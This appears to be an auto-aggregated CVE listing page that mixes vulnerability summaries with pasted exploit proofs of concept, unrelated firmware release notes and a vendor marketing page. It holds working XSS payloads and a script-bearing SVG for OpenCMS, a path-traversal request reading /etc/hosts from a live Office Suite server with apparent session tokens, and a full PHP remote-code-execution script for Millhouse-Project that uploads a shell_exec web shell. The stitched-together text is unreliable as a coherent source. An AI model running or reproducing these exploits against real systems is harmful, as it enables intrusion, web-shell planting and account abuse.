A Cross-Site Request Forgery (CSRF) in the Admin portal of Cockpit CMS v2.5.2 allows attackers to execute arbitrary Administrator commands.

CVE-2023-37650: Multiple Vulnerabilities in Cockpit CMS <= v2.5.2

An arbitrary file upload vulnerability in the component /workplace#!explorer of Alkacon OpenCMS v15.0 allows attackers to execute arbitrary code via uploading a crafted PNG file.

    # Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
    # Date: 1/07/2023
    # Exploit Author: tmrswrr
    # Vendor Homepage: http://www.opencms.org
    # Software Link: https://github.com/alkacon/opencms-core
    # Version: v15.0
    
    
    POC:
    
    1 ) Login in demo page , go to this url
    https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!
    2 ) Click /.galleries/ , after right click any png file  , open gallery, write in search button this payload
    <img src=. onerror=alert(document.domain)>
    3 ) You will be see alert box
    
    POC:
    
    1 ) Go to this url , right click any png file, rename title section and write your payload :  <img src=. onerror=alert(document.domain)>
    https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!
    2 ) You will be see alert box , stored xss 
    
    POC:
    
    1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file
    after save it 
    
    svg file:
    
    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
      <script type="text/javascript">
        alert("XSS");
      </script>
    </svg>
    
    2 ) When click this svg file you will be see alert button

CVE-2023-37602: OffSec’s Exploit Database Archive

The web interface on multiple Samsung Harman AMX N-Series devices allows directory listing for the /tmp/ directory, without authentication, exposing sensitive information such as the command history and screenshot of the file being processed. This affects N-Series N1115 Wallplate Video Encoder before 1.15.61, N-Series N1x22A Video Encoder/Decoder before 1.15.61, N-Series N1x33A Video Encoder/Decoder before 1.15.61, N-Series N1x33 Video Encoder/Decoder before 1.15.61, N-Series N2x35 Video Encoder/Decoder before 1.15.61, N-Series N2x35A Video Encoder/Decoder before 1.15.61, N-Series N2xx2 Video Encoder/Decoder before 1.15.61, N-Series N2xx2A Video Encoder/Decoder before 1.15.61, N-Series N3000 Video Encoder/Decoder before 2.12.105, and N-Series N4321 Audio Transceiver before 1.00.06.

Product Name: N-Series N1115 Wallplate Video Encoder

FG #: FGN1115-WP-WH (NMX-ENC-N1115-WP)

Version: v1.15.64

Release Date:  03/16/2023

\----------------------------------------------------------

1\. Prerequisites

\----------------------------------------------------------

\- None

\----------------------------------------------------------

2\. Revision History

\----------------------------------------------------------

Version 03/16/2023 (v1.5.64)

• Fixed improper SAP discovery packet showing in firmware versions 1.15.61, 1.15.62, 1.15.63

Version 02/20/2023 (v1.5.63)

• added socket reset in event of network communication seize.

Version 02/14/2023 (v1.5.62)

• Updated security for webpage

Version 02/02/2023 (v1.5.61)

• Removed /tmp folder access from webpage

Version 1/17/2023 (v1.15.60)

• Added a new IR command, for directTV ir control using netlinx to N2030

setSettings:irHexAlt:1 - to change the default IR to control directTV boxes

setSettings:irHexAlt:0 - to change back to the default IR control 

Version 10/27/2022 (v1.55.57)

• Correted an issue with AES67 and clocking.

Version 10/24/2022 (v1.15.56)

• change N1115 hdmi input detection logic

• Fixed encoder randomly losing audio over time

Version 7/22/2022 (v1.15.55)

• remove VLAN options from N1115 webpage

• PoE change to Class 3

Version 6/28/2022 (v1.15.52)

• Model hostname change for LLDP report

Version 5/13/2022 (v1.15.51)

• Fixes encoder HDMI detect issues with several sources

Version 10/08/2021 (v1.15.49)

• Fix AES67 streaming to Qsys devices

Version 09/21/2021 (v1.15.48)

• Fix stream changing issue

Version 05/18/2021 (v1.15.46)

• Fix DHCP when updating latest firmware from factory firmware

Version 01/21/2021 (v1.15.45)

• Fix analog audio stops after volume commands

Version 01/08/2021 (v1.15.44)

• N1xxx updated number of slides per playlist to 8

Version 4/22/2020 (v1.15.41)

• LLDP enables class 3 power for POE switches

Version 2/7/2020 (v1.15.40)

• Add new command to create dhcp timing extended

    New command "setSettings:dhcpAgain:300", after

    300 seconds after the unit assigns itself an auto IP, the DHCP process

    would start again.  User can modify the 300 to value they need.

Version 12/13/2019 (v1.15.39)

• Fix random dhcp failure after firmware update

Version 11/15/2019 (v1.15.38)

• Fix commands not working randomly after a reboot

Version 10/31/2019 (v1.15.37)

• Fix HDMI locking issue with certain laptops

Version 10/03/2019 (v1.15.34)

• Fix various issues with VLAN tagging on Decoder

Version 10/03/2019 (v1.15.31)

• Introduced VLAN tagging on Decoder

Version 07/18/2019 (v1.15.26)

• Fixed version reporting incorrect on webpage.

Version 07/10/2019 (v1.15.25)

• Remove VLAN Tagging for decoders for verification of encoders

Version 07/10/2019 (v1.15.24)

• Fixed AES67 Packet Length with VLAN Tagging on N2000A Encoders

Version 07/10/2019 (v1.15.23)

• Fixed AES67 Packet Length with VLAN Tagging on N1000A Encoders

Version 05/20/2019 (v1.15.21)

• Added vlan tagging for video/audio on decoders

Version 6/6/2018 (v1.15.18)

• Added a new optional IR method

• Add commands for relative volume controls

• Netlinx bugfix - buffer RS-232 serial responses to minimize data events

• Fix analog audio left/right bleed issue

• Improved IR output compatiblility 

• Disable SSL ciphers in TLS1.1 and older

• Improve detection of audio codec ESD event

• Add option 'Resync HDMI on Live Play' for compatibility with some displays 

• Improve handling of serial data

• Correct issue with video artifacts

• Improve audio codec ESD resilience

• Updated web security to fix vulnerabilities

• Correct AES67 audio compatibility with QSC Core

• NetLinx bugfixes

• Add support for Samsung Touchpanel

• NetLinx bugfixes

• Correct playback of multichannel AES67 audio

• Corrected an issue with 1080i resolution

Version 9/8/2017 (v1.15.7):

• Corrected an issue with 1080i resolution

Version 9/8/2017 (v1.15.6):

 • Fix potential issue where Hostplay can fail.

Version 8/31/2017 (v1.15.5)

• Improved camera standby support

• Improved detection of DVI vs. HDMI audio on certain sources

• AES67 defaults to port 5004 on factory restore

Version 8/29/2017 (v1.15.4)

• Added Stream Loss Action on web page and select None, HDMI Disable, or Standby mode

• Audio codec recovers from ESD faster

• AES67 limited to 239.x.x.x addresses

Version 8/2/2017 (v1.15.2)

• Netlinx 0.0.32: Defaults to RXON to automatically handle string responses

• Added additional HID touchscreens support

• Interleaved audio streams output correctly when in MPC mode

Version 7/19/2017 (v1.15.1)

• Improved handling of video sources in standby

Version 7/17/2017 (v1.15.0)

• Added 'Display Hostplay on No Input' feature that turns off encoder transmit when no input detected

• Added 'Disable HDCP Adveristing' feature that no longer provides HDCP negotiation on encoder input

Version 7/13/2017 (v1.14.15)

• IR compatibility mode added for support of Foxtel devices

• Host play for Non Supported Mode no longer forces a restart every 30 seconds

• Netlinx 0.0.30: Bug fix

• Added additional touchscreen support

Known bug(s): 1080i is currently encoding incorrectly.  Do not use this intermediate update on 1080i based installs.

Version 6/26/2017 (v1.14.14)

• Improved ability for audio codec to recovery from ESD/shock

Version 6/14/2017 (v1.14.13)

• Microphone bias added and default bias is now OFF

Version 4/03/2017 (v1.14.11b)

• Correct time synchronization handling 

Version 4/03/2017 (v1.14.11)

• Netlinx - Correct display of Svsi devices in Netlinx master webpage

• Netlinx - Correct handling of 1024 byte buffered RS-232 Rx data

• Netlinx- add VIDOUT\_ON-\[ON/OFF\], modify VIOUT\_MUTE to send/disable avmute

• Netlinx- correct truncation of getStatus API response.

• Increase KVM report size for Sharp touchpanel

\----------------------------------------------------------

3\. Known Issues

\----------------------------------------------------------

• 7.1 audio rear and surround channels are distorted when MPC mode is disabled.

CVE-2023-38523: N1115 SVSI Firmware

Office Suite Premium v10.9.1.42602 was discovered to contain a local file inclusion (LFI) vulnerability via the component /etc/hosts.

    # Exploit Title: Office Suite Premium 10.9.1.42602 -  Local File Inclusion # Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

CVE-2023-37601: Office Suite Premium 10.9.1.42602 Local File Inclusion ≈ Packet Storm

Office Suite Premium Version v10.9.1.42602 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the filter parameter at /api?path=files.

    # Exploit Title: Office Suite Premium 10.9.1.42602 - Cross-Site Scripting (reflected)# Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POC# Exploit Details : Following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.Request 1: GET /api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Url: https://connect.mobisystems.com/api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-codePayload: <img src=a onerror=alert(1)>Parameter : applicationRequest 2 : GET /api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527Payload : <img src=a onerror=alert(1)>Parameter: idRequest 3 : GET /api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=searchPayload :<img src=a onerror=alert(1)>Parameter: filter

CVE-2023-38617: Office Suite Premium 10.9.1.42602 Cross Site Scripting ≈ Packet Storm

Millhouse-Project v1.414 was discovered to contain a remote code execution (RCE) vulnerability via the component /add_post_sql.php.

    <?php
    /*
    Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
    Date: 12/05/2023
    Exploit Author: Chokri Hammedi
    Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
    Software Link: https://github.com/thrsrossi/Millhouse-Project.git
    Version: 1.414
    Tested on: Debian
    CVE: N/A
    */
    
    
    $options = getopt('u:c:');
    
    if(!isset($options['u'], $options['c']))
    die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi
    \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
    \033[0m\n
    \n");
    
    $target     =  $options['u'];
    
    $command    =  $options['c'];
    
    $url = $target . '/includes/add_post_sql.php';
    
    
    $post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="title"
    
    helloworld
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="description"
    
    <p>sdsdsds</p>
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="category"
    
    1
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="image"; filename="rose.php"
    Content-Type: application/x-php
    
    <?php
    $shell = shell_exec("' . $command . '");
    echo $shell;
    ?>
    
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
    ';
    
    $headers = array(
        'Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
        'Cookie: PHPSESSID=rose1337',
    );
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, true);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // execute command
    
    $shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
    $ch = curl_init($shell);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $exec_shell = curl_exec($ch);
    curl_close($ch);
    echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";
    
    ?>

CVE-2023-37165: OffSec’s Exploit Database Archive

Diafan CMS v6.0 was discovered to contain a reflected cross-site scripting via the cat_id parameter at /shop/?module=shop&action=search.

    # Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
    # Exploit Author: tmrswrr / Hulya Karabag
    # Vendor Homepage: https://www.diafancms.com/
    # Version: 6.0
    # Tested on: https://demo.diafancms.com
    
    
    Description:
    
    1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:
    Payload : "><script>alert(document.domain)<%2Fscript>
    2) After will you see alert button : 
    https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0

CVE-2023-37164: OffSec’s Exploit Database Archive

A vulnerability was found in Beijing Netcon NS-ASG 6.3. It has been classified as problematic. This affects an unknown part of the file /admin/test_status.php. The manipulation leads to direct request. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235059. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-3792

Imprivata Privileged Access Management (formally Xton Privileged Access Management) 2.3.202112051108 allows XSS.

        

**Privileged access management**

Secure your most sensitive accounts in minutes with Imprivata Privileged Access Management

**Most security breaches involve compromised privileged credentials**

Privileged accounts — those with the highest level of access — pose a greater security risk than the average end user because of the degree of sensitive information that could be exposed. This risk isn’t lost on hackers, which is why 80% of security breaches involve compromised privileged credentials.

*   0
    
    hours saved
    
*   0
    
    years given back to users
    
*   0
    
    time savings
    

Skip list content

**Limit your attack surface**

Incorporate the principle of least privilege by providing just enough access to complete a task through granular policy control at the system level.

**Reduce TCO**

Get going in just minutes with a completely agentless architecture that helps you meet wide-ranging compliance requirements quickly.

**Simplify password management**

Secure and automate privileged password discovery, management, and rotation. Automatically randomize, manage, and vaults passwords and other credentials. 

**Enterprise password vault**

Securely store credentials, passwords, admin and service accounts, keys, and certificates in an AES-256 encrypted vault. Share access to internal, external, or remote resources without disclosing credentials.

**Privileged account security**

Minimize the risk of data breaches associated with compromised privileged credentials and meet wide-ranging regulatory compliance requirements such as GDPR, HIPAA, HITRUST, NIST, and more.

**Privileged access and authentication**

Ensure users are who they say they are before allowing access to privileged accounts with out-of-the-box integration with multifactor authentication.

Imprivata provides high-performance privileged access management both for the inside and the external administrators. It is easy to use, easy to deploy, and enables zero trust.

**How it works**

**See how Imprivata Privileged Access Management fits into the digital identity framework**

The Imprivata digital identity framework is your guide to a secure and efficient system for managing identities across borderless networks. Address the key requirements for a robust strategy with governance and administration, identity management, authorization, and access and authentication.

Skip list content

Infographics

A Continuing Crisis: Third-Party Access

Third-party vendors are an inevitable part of a business environment, which means third-party remote access is a necessity. But this privileged, third-party access and specifically, the risk involved, is a growing problem — and it’s a problem every single organization needs to solve.

View Now

        

Datasheets

Imprivata Privileged Access Management integration with Imprivata OneSign

Read Now

        

Case studies

Freeman Health System enables fast, efficient authentications and easy, secure third-party access

A large Missouri health system partners with Imprivata to implement a secure digital identity management solution that pleases staff, vendors, and cyber insurance providers alike

Read Now

Ready to see Imprivata Privileged Access Management in action?

CVE-2021-45094: Privileged access management

A vulnerability was found in IBOS OA 4.5.5 and classified as critical. Affected by this issue is the function actionExport of the file ?r=contact/default/export of the component Personal Office Address Book. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-235058 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Source

CVE